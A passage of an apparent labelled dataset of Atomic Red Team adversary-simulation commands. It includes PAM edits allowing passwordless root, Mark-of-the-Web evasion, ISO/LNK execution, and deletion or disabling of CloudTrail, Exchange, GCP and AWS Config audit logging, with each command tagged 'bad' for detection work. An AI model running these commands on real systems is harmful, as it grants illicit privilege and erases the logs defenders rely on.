#{path_to_pam_conf}",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1556.003/T1556.003.yaml,Malicious PAM rule,T1556.003,"[""T1556.003""]",linux,0.9,False,"Inserts a rule into a PAM config and then tests it. Upon successful execution, this test will insert a rule that allows every user to su to root without a password. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d369f66ffb8e7f528662378e,"sudo sed -i ""\,#{pam_rule},d"" #{path_to_pam_conf}","sudo sed -i ""\,#{pam_rule},d"" #{path_to_pam_conf}",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1556.003/T1556.003.yaml,Malicious PAM rule,T1556.003,"[""T1556.003""]",linux,0.55,True,"Inserts a rule into a PAM config and then tests it. Upon successful execution, this test will insert a rule that allows every user to su to root without a password. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 18e0b2b6bd3b3d3b8647cb4e,"sudo sed -i """" ""#{index}s,^,#{pam_rule}\n,g"" #{path_to_pam_conf}","sudo sed -i """" ""#{index}s,^,#{pam_rule}\n,g"" #{path_to_pam_conf}",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1556.003/T1556.003.yaml,Malicious PAM rule (freebsd),T1556.003,"[""T1556.003""]",linux,0.9,False,"Inserts a rule into a PAM config and then tests it. Upon successful execution, this test will insert a rule that allows every user to su to root without a password. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review e480c4defa0d7d4a672810f7,"sudo sed -i """" ""/#{pam_rule}/d"" #{path_to_pam_conf}","sudo sed -i """" ""/#{pam_rule}/d"" #{path_to_pam_conf}",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1556.003/T1556.003.yaml,Malicious PAM rule (freebsd),T1556.003,"[""T1556.003""]",linux,0.55,True,"Inserts a rule into a PAM config and then tests it. Upon successful execution, this test will insert a rule that allows every user to su to root without a password. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 5962e3d7ed6c1766905c902a,"Mount-DiskImage -ImagePath ""#{path_of_iso}""","Mount-DiskImage -ImagePath ""#{path_of_iso}""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1553.005/T1553.005.yaml,Mount ISO image,T1553.005,"[""T1553.005""]",windows,0.9,False,"Mounts ISO image downloaded from internet to evade Mark-of-the-Web. Upon successful execution, powershell will download the .iso from the Atomic Red Team repo, and mount the image. The provided sample ISO simply has a Reports shortcut file in it. Reference: https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/ ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 6615cdc13037c17e7d1d68d6,"Dismount-DiskImage -ImagePath ""#{path_of_iso}"" | Out-Null","Dismount-DiskImage -ImagePath ""#{path_of_iso}"" | Out-Null",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1553.005/T1553.005.yaml,Mount ISO image,T1553.005,"[""T1553.005""]",windows,0.55,True,"Mounts ISO image downloaded from internet to evade Mark-of-the-Web. Upon successful execution, powershell will download the .iso from the Atomic Red Team repo, and mount the image. The provided sample ISO simply has a Reports shortcut file in it. Reference: https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/ ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review fc8a601507eeb2f0954c3ff9,"Mount-DiskImage -ImagePath ""#{path_of_iso}"" -StorageType ISO -Access ReadOnly $keep = Get-Volume -FileSystemLabel ""TestIso"" $driveLetter = ($keep | Get-Volume).DriveLetter invoke-item ""$($driveLetter):\hello.exe""","Mount-DiskImage -ImagePath ""#{path_of_iso}"" -StorageType ISO -Access ReadOnly $keep = Get-Volume -FileSystemLabel ""TestIso"" $driveLetter = ($keep | Get-Volume).DriveLetter invoke-item ""$($driveLetter):\hello.exe""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1553.005/T1553.005.yaml,Mount an ISO image and run executable from the ISO,T1553.005,"[""T1553.005""]",windows,0.9,False,"Mounts an ISO image downloaded from internet to evade Mark-of-the-Web and run hello.exe executable from the ISO. Upon successful execution, powershell will download the .iso from the Atomic Red Team repo, mount the image, and run the executable from the ISO image that will open command prompt echoing ""Hello, World!"". ISO provided by:https://twitter.com/mattifestation/status/1398323532988399620 Reference:https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-fro",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d84eaddd8ed31e3c7404809c,"Dismount-DiskImage -ImagePath ""#{path_of_iso}"" | Out-Null Stop-process -name ""hello"" -Force -ErrorAction ignore","Dismount-DiskImage -ImagePath ""#{path_of_iso}"" | Out-Null Stop-process -name ""hello"" -Force -ErrorAction ignore",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1553.005/T1553.005.yaml,Mount an ISO image and run executable from the ISO,T1553.005,"[""T1553.005""]",windows,0.55,True,"Mounts an ISO image downloaded from internet to evade Mark-of-the-Web and run hello.exe executable from the ISO. Upon successful execution, powershell will download the .iso from the Atomic Red Team repo, mount the image, and run the executable from the ISO image that will open command prompt echoing ""Hello, World!"". ISO provided by:https://twitter.com/mattifestation/status/1398323532988399620 Reference:https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-fro",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review b724998c59ceb916e5d7a87c,Unblock-File -Path #{file_path},Unblock-File -Path #{file_path},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1553.005/T1553.005.yaml,Remove the Zone.Identifier alternate data stream,T1553.005,"[""T1553.005""]",windows,0.9,False,"Remove the Zone.Identifier alternate data stream which identifies the file as downloaded from the internet. Removing this allows more freedom in executing scripts in PowerShell and avoids opening files in protected view. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review bac736fd7bd176c928a13a94,"Set-Content -Path #{file_path} -Stream Zone.Identifier -Value '[ZoneTransfer]','ZoneId=3'","Set-Content -Path #{file_path} -Stream Zone.Identifier -Value '[ZoneTransfer]','ZoneId=3'",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1553.005/T1553.005.yaml,Remove the Zone.Identifier alternate data stream,T1553.005,"[""T1553.005""]",windows,0.55,True,"Remove the Zone.Identifier alternate data stream which identifies the file as downloaded from the internet. Removing this allows more freedom in executing scripts in PowerShell and avoids opening files in protected view. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 60e272c0bf31f95372cdbf6d,"Mount-DiskImage -ImagePath ""#{path_of_iso}"" -StorageType ISO -Access ReadOnly $keep = Get-Volume -FileSystemLabel ""AllTheThings"" $driveLetter = ($keep | Get-Volume).DriveLetter $instance = [activator]::CreateInstance([type]::GetTypeFromCLSID(""{c08afd90-f2a1-11d1-8455-00a0c91f3880}"")) $instance.Document.Application.ShellExecute($driveLetter+"":\document.lnk"","""",$driveLetter+"":\"",$null,0)","Mount-DiskImage -ImagePath ""#{path_of_iso}"" -StorageType ISO -Access ReadOnly $keep = Get-Volume -FileSystemLabel ""AllTheThings"" $driveLetter = ($keep | Get-Volume).DriveLetter $instance = [activator]::CreateInstance([type]::GetTypeFromCLSID(""{c08afd90-f2a1-11d1-8455-00a0c91f3880}"")) $instance.Document.Application.ShellExecute($driveLetter+"":\document.lnk"","""",$driveLetter+"":\"",$null,0)",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1553.005/T1553.005.yaml,Execute LNK file from ISO,T1553.005,"[""T1553.005""]",windows,0.9,False,"Executes LNK file document.lnk from AllTheThings.iso. Link file executes cmd.exe and rundll32 to in order to load and execute AllTheThingsx64.dll from the ISO which spawns calc.exe. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review b177cc6307712d5285bfee39,"$RemovableDrives=@() $RemovableDrives = Get-WmiObject -Class Win32_LogicalDisk -filter ""drivetype=2"" | select-object -expandproperty DeviceID ForEach ($Drive in $RemovableDrives) { write-host ""Removable Drive Found:"" $Drive New-Item -Path $Drive/T1091Test1.txt -ItemType ""file"" -Force -Value ""T1091 Test 1 has created this file to simulate malware spread to removable drives."" }","$RemovableDrives=@() $RemovableDrives = Get-WmiObject -Class Win32_LogicalDisk -filter ""drivetype=2"" | select-object -expandproperty DeviceID ForEach ($Drive in $RemovableDrives) { write-host ""Removable Drive Found:"" $Drive New-Item -Path $Drive/T1091Test1.txt -ItemType ""file"" -Force -Value ""T1091 Test 1 has created this file to simulate malware spread to removable drives."" }",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1091/T1091.yaml,USB Malware Spread Simulation,T1091,"[""T1091""]",windows,0.9,False,"Simulates an adversary copying malware to all connected removable drives. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 45531d53e70753934499b224,"$RemovableDrives = Get-WmiObject -Class Win32_LogicalDisk -filter ""drivetype=2"" | select-object -expandproperty DeviceID ForEach ($Drive in $RemovableDrives) { Remove-Item -Path $Drive\T1091Test1.txt -Force -ErrorAction Ignore }","$RemovableDrives = Get-WmiObject -Class Win32_LogicalDisk -filter ""drivetype=2"" | select-object -expandproperty DeviceID ForEach ($Drive in $RemovableDrives) { Remove-Item -Path $Drive\T1091Test1.txt -Force -ErrorAction Ignore }",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1091/T1091.yaml,USB Malware Spread Simulation,T1091,"[""T1091""]",windows,0.55,True,"Simulates an adversary copying malware to all connected removable drives. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d57f769ad87b0695ba0412e8,aws cloudtrail update-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name} --is-multi-region-trail --region #{region} aws cloudtrail stop-logging --name #{cloudtrail_name} --region #{region} aws cloudtrail delete-trail --name #{cloudtrail_name} --region #{region},aws cloudtrail update-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name} --is-multi-region-trail --region #{region} aws cloudtrail stop-logging --name #{cloudtrail_name} --region #{region} aws cloudtrail delete-trail --name #{cloudtrail_name} --region #{region},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1562.008/T1562.008.yaml,AWS - CloudTrail Changes,T1562.008,"[""T1562.008""]",iaas:aws,0.9,False,"Creates a new cloudTrail in AWS, Upon successful creation it will Update,Stop and Delete the cloudTrail ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 2727f8c5060c3fea8b0708ed,"cd ""$PathToAtomicsFolder/T1562.008/src/T1562.008-1/"" terraform destroy -auto-approve","cd ""$PathToAtomicsFolder/T1562.008/src/T1562.008-1/"" terraform destroy -auto-approve",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1562.008/T1562.008.yaml,AWS - CloudTrail Changes,T1562.008,"[""T1562.008""]",iaas:aws,0.55,True,"Creates a new cloudTrail in AWS, Upon successful creation it will Update,Stop and Delete the cloudTrail ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 9d742f9add1f68280668320a,"$secure_pwd = ""#{password}"" | ConvertTo-SecureString -AsPlainText -Force $creds = New-Object System.Management.Automation.PSCredential -ArgumentList ""#{username}"", $secure_pwd Connect-AzureAD -Credential $creds Remove-AzEventHub -ResourceGroupName #{resource_group} -Namespace #{name_space_name} -Name #{event_hub_name}","$secure_pwd = ""#{password}"" | ConvertTo-SecureString -AsPlainText -Force $creds = New-Object System.Management.Automation.PSCredential -ArgumentList ""#{username}"", $secure_pwd Connect-AzureAD -Credential $creds Remove-AzEventHub -ResourceGroupName #{resource_group} -Namespace #{name_space_name} -Name #{event_hub_name}",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1562.008/T1562.008.yaml,Azure - Eventhub Deletion,T1562.008,"[""T1562.008""]",iaas:azure,0.9,False,"Identifies an Event Hub deletion in Azure. An Event Hub is an event processing service that ingests and processes large volumes of events and data. An adversary may delete an Event Hub in an attempt to evade detection. https://docs.microsoft.com/en-us/azure/event-hubs/event-hubs-about. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review aab98073d1372824517da85a,"cd ""$PathToAtomicsFolder/T1562.008/src/T1562.008-2/"" terraform destroy -auto-approve","cd ""$PathToAtomicsFolder/T1562.008/src/T1562.008-2/"" terraform destroy -auto-approve",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1562.008/T1562.008.yaml,Azure - Eventhub Deletion,T1562.008,"[""T1562.008""]",iaas:azure,0.55,True,"Identifies an Event Hub deletion in Azure. An Event Hub is an event processing service that ingests and processes large volumes of events and data. An adversary may delete an Event Hub in an attempt to evade detection. https://docs.microsoft.com/en-us/azure/event-hubs/event-hubs-about. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 19dd3e6172e62776f6e92a81,"$secure_pwd = ""#{password}"" | ConvertTo-SecureString -AsPlainText -Force $creds = New-Object System.Management.Automation.PSCredential -ArgumentList ""#{username}"", $secure_pwd Connect-ExchangeOnline -Credential $creds Set-AdminAuditLogConfig -UnifiedAuditLogIngestionEnabled $False","$secure_pwd = ""#{password}"" | ConvertTo-SecureString -AsPlainText -Force $creds = New-Object System.Management.Automation.PSCredential -ArgumentList ""#{username}"", $secure_pwd Connect-ExchangeOnline -Credential $creds Set-AdminAuditLogConfig -UnifiedAuditLogIngestionEnabled $False",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1562.008/T1562.008.yaml,Office 365 - Exchange Audit Log Disabled,T1562.008,"[""T1562.008""]",office-365,0.9,False,"You can use the Exchange Management Shell to enable or disable mailbox audit logging for a mailbox. Unified or Admin Audit logs are disabled via the Exchange Powershell cmdline. https://github.com/Azure/Azure-Sentinel/blob/master/Detections/OfficeActivity/exchange_auditlogdisabled.yaml ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 70b756a97c58938f999af1bf,"$secure_pwd = ""#{password}"" | ConvertTo-SecureString -AsPlainText -Force $creds = New-Object System.Management.Automation.PSCredential -ArgumentList ""#{username}"", $secure_pwd Connect-ExchangeOnline -Credential $creds Set-AdminAuditLogConfig -UnifiedAuditLogIngestionEnabled $True","$secure_pwd = ""#{password}"" | ConvertTo-SecureString -AsPlainText -Force $creds = New-Object System.Management.Automation.PSCredential -ArgumentList ""#{username}"", $secure_pwd Connect-ExchangeOnline -Credential $creds Set-AdminAuditLogConfig -UnifiedAuditLogIngestionEnabled $True",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1562.008/T1562.008.yaml,Office 365 - Exchange Audit Log Disabled,T1562.008,"[""T1562.008""]",office-365,0.55,True,"You can use the Exchange Management Shell to enable or disable mailbox audit logging for a mailbox. Unified or Admin Audit logs are disabled via the Exchange Powershell cmdline. https://github.com/Azure/Azure-Sentinel/blob/master/Detections/OfficeActivity/exchange_auditlogdisabled.yaml ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 62f3493aed7c0af4f93e9e85,"export AWS_REGION=#{aws_region} cd #{stratus_path} echo ""starting warmup"" ./stratus warmup aws.defense-evasion.cloudtrail-event-selectors echo ""starting detonate"" ./stratus detonate aws.defense-evasion.cloudtrail-event-selectors --force","export AWS_REGION=#{aws_region} cd #{stratus_path} echo ""starting warmup"" ./stratus warmup aws.defense-evasion.cloudtrail-event-selectors echo ""starting detonate"" ./stratus detonate aws.defense-evasion.cloudtrail-event-selectors --force",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1562.008/T1562.008.yaml,AWS - Disable CloudTrail Logging Through Event Selectors using Stratus,T1562.008,"[""T1562.008""]","linux,macos,iaas:aws",0.9,False,"Update event selectors in AWS CloudTrail to disable the logging of certain management events to evade defense. This Atomic test leverages a tool called Stratus-Red-Team built by DataDog (https://github.com/DataDog/stratus-red-team). Stratus Red Team is a self-contained binary. You can use it to easily detonate offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.cloudtrail-event-selectors/ ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 7e8d5098c75a9733b4c8c778,"export AWS_REGION=#{aws_region} echo ""Cleanup detonation"" cd #{stratus_path} ./stratus cleanup --all rm -rf stratus*","export AWS_REGION=#{aws_region} echo ""Cleanup detonation"" cd #{stratus_path} ./stratus cleanup --all rm -rf stratus*",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1562.008/T1562.008.yaml,AWS - Disable CloudTrail Logging Through Event Selectors using Stratus,T1562.008,"[""T1562.008""]","linux,macos,iaas:aws",0.55,True,"Update event selectors in AWS CloudTrail to disable the logging of certain management events to evade defense. This Atomic test leverages a tool called Stratus-Red-Team built by DataDog (https://github.com/DataDog/stratus-red-team). Stratus Red Team is a self-contained binary. You can use it to easily detonate offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.cloudtrail-event-selectors/ ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review e674cde2b36e960667083921,"export AWS_REGION=#{aws_region} cd #{stratus_path} echo ""starting warmup"" ./stratus warmup aws.defense-evasion.cloudtrail-lifecycle-rule echo ""starting detonate"" ./stratus detonate aws.defense-evasion.cloudtrail-lifecycle-rule --force","export AWS_REGION=#{aws_region} cd #{stratus_path} echo ""starting warmup"" ./stratus warmup aws.defense-evasion.cloudtrail-lifecycle-rule echo ""starting detonate"" ./stratus detonate aws.defense-evasion.cloudtrail-lifecycle-rule --force",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1562.008/T1562.008.yaml,AWS - CloudTrail Logs Impairment Through S3 Lifecycle Rule using Stratus,T1562.008,"[""T1562.008""]","linux,macos,iaas:aws",0.9,False,This Atomic test will use the Stratus Red Team will first setup a CloudTrail logging into an S3 bucket and will then make an API call to update the lifecycle rule on that S3 bucket with an expiration date of 1 day. This will essentially delete all the logs after one day. Adversaries often do this actiivity to evade detection. Stratus Red Team is a self-contained binary. You can use it to easily detonate offensive attack techniques against a live cloud environment. ref: https://stratus-red-team.c,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review b98121d6f2f963c8e1e49440,"export AWS_REGION=#{aws_region} cd #{stratus_path} echo ""starting warmup"" ./stratus warmup aws.defense-evasion.vpc-remove-flow-logs echo ""starting detonate"" ./stratus detonate aws.defense-evasion.vpc-remove-flow-logs --force","export AWS_REGION=#{aws_region} cd #{stratus_path} echo ""starting warmup"" ./stratus warmup aws.defense-evasion.vpc-remove-flow-logs echo ""starting detonate"" ./stratus detonate aws.defense-evasion.vpc-remove-flow-logs --force",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1562.008/T1562.008.yaml,AWS - Remove VPC Flow Logs using Stratus,T1562.008,"[""T1562.008""]","linux,macos,iaas:aws",0.9,False,"This Atomic will attempt to remove AWS VPC Flow Logs configuration. Stratus Red Team is a self-contained binary. You can use it to easily detonate offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.vpc-remove-flow-logs/ ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 392c5ef4c72a8d13d6f1d1c7,"aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json echo ""*** Log Group Created ***"" aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json echo ""*** Log Group Deleted ***""","aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json echo ""*** Log Group Created ***"" aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json echo ""*** Log Group Deleted ***""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1562.008/T1562.008.yaml,AWS - CloudWatch Log Group Deletes,T1562.008,"[""T1562.008""]",iaas:aws,0.9,False,"Creates a new cloudWatch log group in AWS, Upon successful creation it will Delete the group. Attackers can use this technique to evade defenses by deleting the log stream. Once it is deleted, the logs created by the attackers will not be logged. https://www.elastic.co/guide/en/security/current/aws-cloudwatch-log-group-deletion.html#aws-cloudwatch-log-group-deletion ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d2cfde76e231767a8f833bcb,"$secure_pwd = ""#{password}"" | ConvertTo-SecureString -AsPlainText -Force $creds = New-Object System.Management.Automation.PSCredential -ArgumentList ""#{username}"", $secure_pwd Connect-ExchangeOnline -Credential $creds Set-MailboxAuditBypassAssociation -Identity ""#{target_email}"" -AuditBypassEnabled $true","$secure_pwd = ""#{password}"" | ConvertTo-SecureString -AsPlainText -Force $creds = New-Object System.Management.Automation.PSCredential -ArgumentList ""#{username}"", $secure_pwd Connect-ExchangeOnline -Credential $creds Set-MailboxAuditBypassAssociation -Identity ""#{target_email}"" -AuditBypassEnabled $true",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1562.008/T1562.008.yaml,Office 365 - Set Audit Bypass For a Mailbox,T1562.008,"[""T1562.008""]",office-365,0.9,False,"Use Exchange Management Shell to Mailbox auditing to bypass. It will prevent any mailbox audit logging entries being generated for the target e-mail box. https://learn.microsoft.com/en-us/powershell/module/exchange/set-mailboxauditbypassassociation?view=exchange-ps ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review fb28a9fe9933555503581fc8,"$secure_pwd = ""#{password}"" | ConvertTo-SecureString -AsPlainText -Force $creds = New-Object System.Management.Automation.PSCredential -ArgumentList ""#{username}"", $secure_pwd Connect-ExchangeOnline -Credential $creds Set-MailboxAuditBypassAssociation -Identity ""#{target_email}"" -AuditBypassEnabled $false Disconnect-ExchangeOnline -Confirm:$false","$secure_pwd = ""#{password}"" | ConvertTo-SecureString -AsPlainText -Force $creds = New-Object System.Management.Automation.PSCredential -ArgumentList ""#{username}"", $secure_pwd Connect-ExchangeOnline -Credential $creds Set-MailboxAuditBypassAssociation -Identity ""#{target_email}"" -AuditBypassEnabled $false Disconnect-ExchangeOnline -Confirm:$false",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1562.008/T1562.008.yaml,Office 365 - Set Audit Bypass For a Mailbox,T1562.008,"[""T1562.008""]",office-365,0.55,True,"Use Exchange Management Shell to Mailbox auditing to bypass. It will prevent any mailbox audit logging entries being generated for the target e-mail box. https://learn.microsoft.com/en-us/powershell/module/exchange/set-mailboxauditbypassassociation?view=exchange-ps ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review e69519e496fe68077fd3b4a9,gcloud config set project #{project-id} gcloud logging logs delete projects/#{project-id}/logs/cloudaudit.googleapis.com%2Factivity --quiet,gcloud config set project #{project-id} gcloud logging logs delete projects/#{project-id}/logs/cloudaudit.googleapis.com%2Factivity --quiet,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1562.008/T1562.008.yaml,GCP - Delete Activity Event Log,T1562.008,"[""T1562.008""]",iaas:gcp,0.9,False,"GCP provides 4 types of Cloud Audit Logs: Admin Activity, Data Access, System Events, and Policy Denied. An adversary may attempt to delete logs in order to hide their activity. However, Admin Activity, System Events, and Policy Deny events logs cannot be deleted. This Atomic attempts to delete the Activity Event log. An event is generated under the method name of `google.logging.v2.LoggingServiceV2.DeleteLog` with a Serverity of `ERROR`. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 10525ea21863c1fd9bb2878c,"aws configservice stop-configuration-recorder --configuration-recorder-name #{configuration_recorder_name} --region #{region} echo ""*** Configuration recorder stopped ***"" aws configservice delete-delivery-channel --delivery-channel-name #{delivery_channel_name} --region #{region} echo ""*** Delivery channel deleted ***"" aws configservice delete-configuration-recorder --configuration-recorder-name #{configuration_recorder_name} --region #{region} echo ""*** Configuration recorder deleted ***""","aws configservice stop-configuration-recorder --configuration-recorder-name #{configuration_recorder_name} --region #{region} echo ""*** Configuration recorder stopped ***"" aws configservice delete-delivery-channel --delivery-channel-name #{delivery_channel_name} --region #{region} echo ""*** Delivery channel deleted ***"" aws configservice delete-configuration-recorder --configuration-recorder-name #{configuration_recorder_name} --region #{region} echo ""*** Configuration recorder deleted ***""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1562.008/T1562.008.yaml,AWS - Config Logs Disabled,T1562.008,"[""T1562.008""]",iaas:aws,0.9,False,"Disables AWS Config by stopping the configuration recorder, deleting the delivery channel, and deleting the configuration recorder. An attacker with sufficient permissions can use this to stop configuration change recording and avoid detection of subsequent activity. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 78b1fd74258c20efe0563b86,aws configservice list-configuration-recorders --region us-west-2,aws configservice list-configuration-recorders --region us-west-2,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1562.008/T1562.008.yaml,AWS - Config Logs Disabled,T1562.008,"[""T1562.008""]",iaas:aws,0.55,True,"Disables AWS Config by stopping the configuration recorder, deleting the delivery channel, and deleting the configuration recorder. An attacker with sufficient permissions can use this to stop configuration change recording and avoid detection of subsequent activity. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review b8de113b4ea82f3a6549e1c1,ps >> #{output_file} ps aux >> #{output_file},ps >> #{output_file} ps aux >> #{output_file},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1057/T1057.yaml,Process Discovery - ps,T1057,"[""T1057""]","linux,macos",0.9,False,"Utilize ps to identify processes. Upon successful execution, sh will execute ps and output to /tmp/loot.txt. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 9d4816bf56e5ad52de30c9d8,rm #{output_file},rm #{output_file},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1057/T1057.yaml,Process Discovery - ps,T1057,"[""T1057""]","linux,macos",0.55,True,"Utilize ps to identify processes. Upon successful execution, sh will execute ps and output to /tmp/loot.txt. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review a348a10b4b68bb2677a8768e,get-wmiObject -class Win32_Process,get-wmiObject -class Win32_Process,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1057/T1057.yaml,Process Discovery - get-wmiObject,T1057,"[""T1057""]",windows,0.9,False,"Utilize get-wmiObject PowerShell cmdlet to identify processes. Upon successful execution, powershell.exe will execute get-wmiObject to list processes. Output will be via stdout. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review f96a7887becf222110882bbc,wmic process get /format:list,wmic process get /format:list,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1057/T1057.yaml,Process Discovery - wmic process,T1057,"[""T1057""]",windows,0.9,False,"Utilize windows management instrumentation to identify processes. Upon successful execution, WMIC will execute process to list processes. Output will be via stdout. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review e0385dd71dee5385daec907b,tasklist | findstr #{process_to_enumerate},tasklist | findstr #{process_to_enumerate},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1057/T1057.yaml,Discover Specific Process - tasklist,T1057,"[""T1057""]",windows,0.9,False,"Adversaries may use command line tools to discover specific processes in preparation of further attacks. Examples of this could be discovering the PID of lsass.exe to dump its memory or discovering whether specific security processes (e.g. AV or EDR) are running. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review abd58e89dba2e3cca5ab7715,"Start-Process -FilePath ""$Env:ProgramFiles\Process Hacker 2\#{processhacker_exe}""","Start-Process -FilePath ""$Env:ProgramFiles\Process Hacker 2\#{processhacker_exe}""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1057/T1057.yaml,Process Discovery - Process Hacker,T1057,"[""T1057""]",windows,0.9,False,"Process Hacker can be exploited to infiltrate system processes, identify weak points, or achieve unauthorized control over systems. However, its malicious use can often be flagged by security defenses, rendering it a perilous tool for illegitimate purposes.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 1894cfa374a46834cd393ffc,"Start-Process -FilePath ""C:\Temp\ExternalPayloads\PCHunter_free\#{pchunter64_exe}""","Start-Process -FilePath ""C:\Temp\ExternalPayloads\PCHunter_free\#{pchunter64_exe}""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1057/T1057.yaml,Process Discovery - PC Hunter,T1057,"[""T1057""]",windows,0.9,False,"PC Hunter is a toolkit with access to hundreds of settings including kernels, kernel modules, processes, network, startup, and more. When abused, this tool can allow threat actors to effectively access sensitive processes, collect system information, and terminate security software.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review bccaf89f699f18dad33e6ce8,taskmgr.exe /7,taskmgr.exe 